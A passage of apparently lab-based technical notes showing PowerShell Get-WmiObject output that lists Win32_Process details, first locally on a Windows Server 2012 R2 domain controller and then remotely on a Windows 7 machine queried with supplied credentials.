\\WIN-2012-DC\root\cimv2:Win32_Process.Handle="840" Caption : WmiPrvSE.exe CommandLine : C:\Windows\system32\wbem\wmiprvse.exe CreationClassName : Win32_Process CreationDate : 20170712165108.172589-420 CSCreationClassName : Win32_ComputerSystem CSName : WIN-2012-DC Description : WmiPrvSE.exe ExecutablePath : C:\Windows\system32\wbem\wmiprvse.exe ExecutionState : Handle : 840 HandleCount : 129 InstallDate : KernelModeTime : 312500 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : WmiPrvSE.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows Server 2012 R2 Standard Evaluation|C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 1184 OtherTransferCount : 244 PageFaults : 4433 PageFileUsage : 2152 ParentProcessId : 572 PeakPageFileUsage : 2624 PeakVirtualSize : 35962880 PeakWorkingSetSize : 5924 Priority : 8 PrivatePageCount : 2203648 ProcessId : 840 QuotaNonPagedPoolUsage : 9 QuotaPagedPoolUsage : 62 QuotaPeakNonPagedPoolUsage : 11 QuotaPeakPagedPoolUsage : 64 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 7 UserModeTime : 156250 VirtualSize : 34516992 WindowsVersion : 6.3.9600 WorkingSetSize : 5709824 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : WIN-2012-DC ProcessName : WmiPrvSE.exe Handles : 129 VM : 34516992 WS : 5709824 Path : C:\Windows\system32\wbem\wmiprvse.exe PS C:\Users\Administrator> ``` - Using ```Get-WmiObject``` - ```Remote``` ``` PS C:\Users\Administrator> Get-WmiObject -Class Win32_Process -ComputerName JOHN-PC -Credential John-PC\John __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="0" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="0" Caption : System Idle Process CommandLine : CreationClassName : Win32_Process CreationDate : CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : System Idle Process ExecutablePath : ExecutionState : Handle : 0 HandleCount : 0 InstallDate : KernelModeTime : 203835200624 MaximumWorkingSetSize : MinimumWorkingSetSize : Name : System Idle Process OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 0 OtherTransferCount : 0 PageFaults : 0 PageFileUsage : 0 ParentProcessId : 0 PeakPageFileUsage : 0 PeakVirtualSize : 0 PeakWorkingSetSize : 0 Priority : 0 PrivatePageCount : 0 ProcessId : 0 QuotaNonPagedPoolUsage : 0 QuotaPagedPoolUsage : 0 QuotaPeakNonPagedPoolUsage : 0 QuotaPeakPagedPoolUsage : 0 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 1 UserModeTime : 0 VirtualSize : 0 WindowsVersion : 6.1.7600 WorkingSetSize : 12288 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : JOHN-PC ProcessName : System Idle Process Handles : 0 VM : 0 WS : 12288 Path : __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="4" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="4" Caption : System CommandLine : CreationClassName : Win32_Process CreationDate : 20170712122327.686019-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : System ExecutablePath : ExecutionState : Handle : 4 HandleCount : 566 InstallDate : KernelModeTime : 96638960 MaximumWorkingSetSize : MinimumWorkingSetSize : Name : System OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 7608 OtherTransferCount : 617853 PageFaults : 10151 PageFileUsage : 44 ParentProcessId : 0 PeakPageFileUsage : 180 PeakVirtualSize : 6365184 PeakWorkingSetSize : 4840 Priority : 8 PrivatePageCount : 45056 ProcessId : 4 QuotaNonPagedPoolUsage : 0 QuotaPagedPoolUsage : 0 QuotaPeakNonPagedPoolUsage : 0 QuotaPeakPagedPoolUsage : 0 ReadOperationCount : 1468 ReadTransferCount : 26788136 SessionId : 0 Status : TerminationDate : ThreadCount : 85 UserModeTime : 0 VirtualSize : 1966080 WindowsVersion : 6.1.7600 WorkingSetSize : 606208 WriteOperationCount : 6499 WriteTransferCount : 59286136 PSComputerName : JOHN-PC ProcessName : System Handles : 566 VM : 1966080 WS : 606208 Path : __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="272" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="272" Caption : smss.exe CommandLine : \SystemRoot\System32\smss.exe CreationClassName : Win32_Process CreationDate : 20170712122327.696033-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : smss.exe ExecutablePath : ExecutionState : Handle : 272 HandleCount : 29 InstallDate : KernelModeTime : 600864 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : smss.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 318 OtherTransferCount : 8646 PageFaults : 293 PageFileUsage : 216 ParentProcessId : 4 PeakPageFileUsage : 268 PeakVirtualSize : 17027072 PeakWorkingSetSize : 720 Priority : 11 PrivatePageCount : 221184 ProcessId : 272 QuotaNonPagedPoolUsage : 1 QuotaPagedPoolUsage : 8 QuotaPeakNonPagedPoolUsage : 5 QuotaPeakPagedPoolUsage : 20 ReadOperationCount : 12 ReadTransferCount : 29214 SessionId : 0 Status : TerminationDate : ThreadCount : 2 UserModeTime : 0 VirtualSize : 4145152 WindowsVersion : 6.1.7600 WorkingSetSize : 532480 WriteOperationCount : 5 WriteTransferCount : 20 PSComputerName : JOHN-PC ProcessName : smss.exe Handles : 29 VM : 4145152 WS : 532480 Path : __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="348" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="348" Caption : csrss.exe CommandLine : %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 CreationClassName : Win32_Process CreationDate : 20170712122328.577300-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : csrss.exe ExecutablePath : C:\Windows\system32\csrss.exe ExecutionState : Handle : 348 HandleCount : 370 InstallDate : KernelModeTime : 1502160 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : csrss.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 1996 OtherTransferCount : 93042 PageFaults : 1636 PageFileUsage : 1116 ParentProcessId : 340 PeakPageFileUsage : 1116 PeakVirtualSize : 34533376 PeakWorkingSetSize : 2688 Priority : 13 PrivatePageCount : 1142784 ProcessId : 348 QuotaNonPagedPoolUsage : 5 QuotaPagedPoolUsage : 56 QuotaPeakNonPagedPoolUsage : 9 QuotaPeakPagedPoolUsage : 58 ReadOperationCount : 182 ReadTransferCount : 144624 SessionId : 0 Status : TerminationDate : ThreadCount : 8 UserModeTime : 400576 VirtualSize : 34271232 WindowsVersion : 6.1.7600 WorkingSetSize : 2179072 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : JOHN-PC ProcessName : csrss.exe Handles : 370 VM : 34271232 WS : 2179072 Path : C:\Windows\system32\csrss.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="396" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="396" Caption : wininit.exe CommandLine : wininit.exe CreationClassName : Win32_Process CreationDate : 20170712122328.627372-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : wininit.exe ExecutablePath : C:\Windows\system32\wininit.exe ExecutionState : Handle : 396 HandleCount : 74 InstallDate : KernelModeTime : 801152 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : wininit.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 719 OtherTransferCount : 3906 PageFaults : 1051 PageFileUsage : 784 ParentProcessId : 340 PeakPageFileUsage : 928 PeakVirtualSize : 49909760 PeakWorkingSetSize : 3208 Priority : 13 PrivatePageCount : 802816 ProcessId : 396 QuotaNonPagedPoolUsage : 5 QuotaPagedPoolUsage : 42 QuotaPeakNonPagedPoolUsage : 7 QuotaPeakPagedPoolUsage : 51 ReadOperationCount : 1 ReadTransferCount : 5632 SessionId : 0 Status : TerminationDate : ThreadCount : 3 UserModeTime : 0 VirtualSize : 34000896 WindowsVersion : 6.1.7600 WorkingSetSize : 2568192 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : JOHN-PC ProcessName : wininit.exe Handles : 74 VM : 34000896 WS : 2568192 Path : C:\Windows\system32\wininit.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="404" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="404" Caption : csrss.exe CommandLine : %SystemRoot%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 CreationClassName : Win32_Process CreationDate : 20170712122328.627372-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : csrss.exe ExecutablePath : C:\Windows\system32\csrss.exe ExecutionState : Handle : 404 HandleCount : 221 InstallDate : KernelModeTime : 5307632 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : csrss.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 2622 OtherTransferCount : 33872 PageFaults : 20109 PageFileUsage : 1272 ParentProcessId : 388 PeakPageFileUsage : 1404 PeakVirtualSize : 239112192 PeakWorkingSetSize : 11168 Priority : 13 PrivatePageCount : 1302528 ProcessId : 404 QuotaNonPagedPoolUsage : 9 QuotaPagedPoolUsage : 115 QuotaPeakNonPagedPoolUsage : 14 QuotaPeakPagedPoolUsage : 239 ReadOperationCount : 9108 ReadTransferCount : 482433 SessionId : 1 Status : TerminationDate : ThreadCount : 9 UserModeTime : 1301872 VirtualSize : 107212800 WindowsVersion : 6.1.7600 WorkingSetSize : 2985984 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : JOHN-PC ProcessName : csrss.exe Handles : 221 VM : 107212800 WS : 2985984 Path : C:\Windows\system32\csrss.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="444" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="444" Caption : winlogon.exe CommandLine : winlogon.exe CreationClassName : Win32_Process CreationDate : 20170712122328.707488-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : winlogon.exe ExecutablePath : C:\Windows\system32\winlogon.exe ExecutionState : Handle : 444 HandleCount : 112 InstallDate : KernelModeTime : 1301872 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : winlogon.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 1197 OtherTransferCount : 6288 PageFaults : 3096 PageFileUsage : 1492 ParentProcessId : 388 PeakPageFileUsage : 2776 PeakVirtualSize : 51965952 PeakWorkingSetSize : 6028 Priority : 13 PrivatePageCount : 1527808 ProcessId : 444 QuotaNonPagedPoolUsage : 5 QuotaPagedPoolUsage : 40 QuotaPeakNonPagedPoolUsage : 11 QuotaPeakPagedPoolUsage : 52 ReadOperationCount : 3 ReadTransferCount : 5776 SessionId : 1 Status : TerminationDate : ThreadCount : 3 UserModeTime : 600864 VirtualSize : 40443904 WindowsVersion : 6.1.7600 WorkingSetSize : 3280896 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : JOHN-PC ProcessName : winlogon.exe Handles : 112 VM : 40443904 WS : 3280896 Path : C:\Windows\system32\winlogon.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="488" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="488" Caption : services.exe CommandLine : C:\Windows\system32\services.exe CreationClassName : Win32_Process CreationDate : 20170712122328.777588-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : services.exe ExecutablePath : C:\Windows\system32\services.exe ExecutionState : Handle : 488 HandleCount : 194 InstallDate : KernelModeTime : 8412096 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : services.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 2999 OtherTransferCount : 420188 PageFaults : 6561 PageFileUsage : 4460 ParentProcessId : 396 PeakPageFileUsage : 7296 PeakVirtualSize : 40091648 PeakWorkingSetSize : 9768 Priority : 9 PrivatePageCount : 4567040 ProcessId : 488 QuotaNonPagedPoolUsage : 8 QuotaPagedPoolUsage : 27 QuotaPeakNonPagedPoolUsage : 16 QuotaPeakPagedPoolUsage : 32 ReadOperationCount : 117 ReadTransferCount : 500876 SessionId : 0 Status : TerminationDate : ThreadCount : 8 UserModeTime : 1702448 VirtualSize : 35315712 WindowsVersion : 6.1.7600 WorkingSetSize : 4816896 WriteOperationCount : 973 WriteTransferCount : 3821996 PSComputerName : JOHN-PC ProcessName : services.exe Handles : 194 VM : 35315712 WS : 4816896 Path : C:\Windows\system32\services.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="496" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="496" Caption : lsass.exe CommandLine : C:\Windows\system32\lsass.exe CreationClassName : Win32_Process CreationDate : 20170712122328.807632-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : lsass.exe ExecutablePath : C:\Windows\system32\lsass.exe ExecutionState : Handle : 496 HandleCount : 800 InstallDate : KernelModeTime : 8311952 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : lsass.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 5618 OtherTransferCount : 583732 PageFaults : 3438 PageFileUsage : 3120 ParentProcessId : 396 PeakPageFileUsage : 3120 PeakVirtualSize : 34959360 PeakWorkingSetSize : 7556 Priority : 9 PrivatePageCount : 3194880 ProcessId : 496 QuotaNonPagedPoolUsage : 15 QuotaPagedPoolUsage : 50 QuotaPeakNonPagedPoolUsage : 16 QuotaPeakPagedPoolUsage : 50 ReadOperationCount : 1713 ReadTransferCount : 109701 SessionId : 0 Status : TerminationDate : ThreadCount : 11 UserModeTime : 8011520 VirtualSize : 34435072 WindowsVersion : 6.1.7600 WorkingSetSize : 7110656 WriteOperationCount : 1470 WriteTransferCount : 138645 PSComputerName : JOHN-PC ProcessName : lsass.exe Handles : 800 VM : 34435072 WS : 7110656 Path : C:\Windows\system32\lsass.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="504" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="504" Caption : lsm.exe CommandLine : C:\Windows\system32\lsm.exe CreationClassName : Win32_Process CreationDate : 20170712122328.807632-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : lsm.exe ExecutablePath : C:\Windows\system32\lsm.exe ExecutionState : Handle : 504 HandleCount : 200 InstallDate : KernelModeTime : 200288 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : lsm.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 133 OtherTransferCount : 560 PageFaults : 4457 PageFileUsage : 1648 ParentProcessId : 396 PeakPageFileUsage : 1648 PeakVirtualSize : 24059904 PeakWorkingSetSize : 3924 Priority : 8 PrivatePageCount : 1687552 ProcessId : 504 QuotaNonPagedPoolUsage : 5 QuotaPagedPoolUsage : 25 QuotaPeakNonPagedPoolUsage : 6 QuotaPeakPagedPoolUsage : 25 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 11 UserModeTime : 901296 VirtualSize : 23797760 WindowsVersion : 6.1.7600 WorkingSetSize : 3575808 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : JOHN-PC ProcessName : lsm.exe Handles : 200 VM : 23797760 WS : 3575808 Path : C:\Windows\system32\lsm.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="608" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="608" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k DcomLaunch CreationClassName : Win32_Process CreationDate : 20170712122329.378452-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 608 HandleCount : 353 InstallDate : KernelModeTime : 8111664 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 29613 OtherTransferCount : 530904 PageFaults : 67578 PageFileUsage : 3020 ParentProcessId : 488 PeakPageFileUsage : 3020 PeakVirtualSize : 40407040 PeakWorkingSetSize : 6016 Priority : 8 PrivatePageCount : 3092480 ProcessId : 608 QuotaNonPagedPoolUsage : 7 QuotaPagedPoolUsage : 36 QuotaPeakNonPagedPoolUsage : 13 QuotaPeakPagedPoolUsage : 39 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 10 UserModeTime : 3404896 VirtualSize : 36839424 WindowsVersion : 6.1.7600 WorkingSetSize : 6021120 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : JOHN-PC ProcessName : svchost.exe Handles : 353 VM : 36839424 WS : 6021120 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="668" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="668" Caption : VBoxService.exe CommandLine : C:\Windows\System32\VBoxService.exe CreationClassName : Win32_Process CreationDate : 20170712122329.568726-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : VBoxService.exe ExecutablePath : C:\Windows\System32\VBoxService.exe ExecutionState : Handle : 668 HandleCount : 118 InstallDate : KernelModeTime : 3605184 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : VBoxService.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 174313 OtherTransferCount : 4164921 PageFaults : 48385 PageFileUsage : 2344 ParentProcessId : 488 PeakPageFileUsage : 2352 PeakVirtualSize : 46714880 PeakWorkingSetSize : 3876 Priority : 8 PrivatePageCount : 2400256 ProcessId : 668 QuotaNonPagedPoolUsage : 5 QuotaPagedPoolUsage : 36 QuotaPeakNonPagedPoolUsage : 6 QuotaPeakPagedPoolUsage : 37 ReadOperationCount : 4047 ReadTransferCount : 16188 SessionId : 0 Status : TerminationDate : ThreadCount : 12 UserModeTime : 1201728 VirtualSize : 46706688 WindowsVersion : 6.1.7600 WorkingSetSize : 3919872 WriteOperationCount : 4047 WriteTransferCount : 64752 PSComputerName : JOHN-PC ProcessName : VBoxService.exe Handles : 118 VM : 46706688 WS : 3919872 Path : C:\Windows\System32\VBoxService.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="720" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="720" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k RPCSS CreationClassName : Win32_Process CreationDate : 20170712122329.739972-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 720 HandleCount : 273 InstallDate : KernelModeTime : 3605184 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 322 OtherTransferCount : 15508 PageFaults : 3747 PageFileUsage : 3140 ParentProcessId : 488 PeakPageFileUsage : 3140 PeakVirtualSize : 29499392 PeakWorkingSetSize : 5388 Priority : 8 PrivatePageCount : 3215360 ProcessId : 720 QuotaNonPagedPoolUsage : 10 QuotaPagedPoolUsage : 40 QuotaPeakNonPagedPoolUsage : 10 QuotaPeakPagedPoolUsage : 41 ReadOperationCount : 0 ReadTransferCount : 0 SessionId : 0 Status : TerminationDate : ThreadCount : 8 UserModeTime : 6909936 VirtualSize : 29499392 WindowsVersion : 6.1.7600 WorkingSetSize : 5517312 WriteOperationCount : 0 WriteTransferCount : 0 PSComputerName : JOHN-PC ProcessName : svchost.exe Handles : 273 VM : 29499392 WS : 5517312 Path : C:\Windows\system32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="772" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="772" Caption : svchost.exe CommandLine : C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted CreationClassName : Win32_Process CreationDate : 20170712122329.795051-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : svchost.exe ExecutablePath : C:\Windows\System32\svchost.exe ExecutionState : Handle : 772 HandleCount : 564 InstallDate : KernelModeTime : 6208928 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 3507 OtherTransferCount : 95164 PageFaults : 8131 PageFileUsage : 13912 ParentProcessId : 488 PeakPageFileUsage : 14620 PeakVirtualSize : 84037632 PeakWorkingSetSize : 12680 Priority : 8 PrivatePageCount : 14245888 ProcessId : 772 QuotaNonPagedPoolUsage : 13 QuotaPagedPoolUsage : 72 QuotaPeakNonPagedPoolUsage : 16 QuotaPeakPagedPoolUsage : 76 ReadOperationCount : 269 ReadTransferCount : 5796459 SessionId : 0 Status : TerminationDate : ThreadCount : 21 UserModeTime : 3805472 VirtualSize : 79962112 WindowsVersion : 6.1.7600 WorkingSetSize : 10862592 WriteOperationCount : 629 WriteTransferCount : 1781499 PSComputerName : JOHN-PC ProcessName : svchost.exe Handles : 564 VM : 79962112 WS : 10862592 Path : C:\Windows\System32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="900" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="900" Caption : svchost.exe CommandLine : C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted CreationClassName : Win32_Process CreationDate : 20170712122330.290762-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : svchost.exe ExecutablePath : C:\Windows\System32\svchost.exe ExecutionState : Handle : 900 HandleCount : 502 InstallDate : KernelModeTime : 56781648 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 157709 OtherTransferCount : 6589070 PageFaults : 53228 PageFileUsage : 31136 ParentProcessId : 488 PeakPageFileUsage : 36328 PeakVirtualSize : 112607232 PeakWorkingSetSize : 39640 Priority : 8 PrivatePageCount : 31883264 ProcessId : 900 QuotaNonPagedPoolUsage : 13 QuotaPagedPoolUsage : 79 QuotaPeakNonPagedPoolUsage : 15 QuotaPeakPagedPoolUsage : 82 ReadOperationCount : 777 ReadTransferCount : 16290731 SessionId : 0 Status : TerminationDate : ThreadCount : 24 UserModeTime : 79714624 VirtualSize : 107683840 WindowsVersion : 6.1.7600 WorkingSetSize : 32575488 WriteOperationCount : 17711 WriteTransferCount : 6508584 PSComputerName : JOHN-PC ProcessName : svchost.exe Handles : 502 VM : 107683840 WS : 32575488 Path : C:\Windows\System32\svchost.exe __GENUS : 2 __CLASS : Win32_Process __SUPERCLASS : CIM_Process __DYNASTY : CIM_ManagedSystemElement __RELPATH : Win32_Process.Handle="940" __PROPERTY_COUNT : 45 __DERIVATION : {CIM_Process, CIM_LogicalElement, CIM_ManagedSystemElement} __SERVER : JOHN-PC __NAMESPACE : root\cimv2 __PATH : \\JOHN-PC\root\cimv2:Win32_Process.Handle="940" Caption : svchost.exe CommandLine : C:\Windows\system32\svchost.exe -k netsvcs CreationClassName : Win32_Process CreationDate : 20170712122330.356857-420 CSCreationClassName : Win32_ComputerSystem CSName : JOHN-PC Description : svchost.exe ExecutablePath : C:\Windows\system32\svchost.exe ExecutionState : Handle : 940 HandleCount : 1401 InstallDate : KernelModeTime : 147912688 MaximumWorkingSetSize : 1380 MinimumWorkingSetSize : 200 Name : svchost.exe OSCreationClassName : Win32_OperatingSystem OSName : Microsoft Windows 7 Ultimate |C:\Windows|\Device\Harddisk0\Partition2 OtherOperationCount : 876271 OtherTransferCount : 249422697 PageFaults : 278297 PageFileUsage : 24528 ParentProcessId : 488 PeakPageFileUsage : 105120 PeakVirtualSize : 234819584 PeakWorkingSetSize : 90176 Priority : 8 PrivatePageCount : 25116672 ProcessId : 940 QuotaNonPagedPoolUsage : 35 QuotaPagedPoolUsage : 132 QuotaPeakNonPagedPoolUsage : 140 QuotaPeakPagedPoolUsage : 173 ReadOperationCount : 150899 ReadTransferCount : 614189472 SessionId : 0 Status : 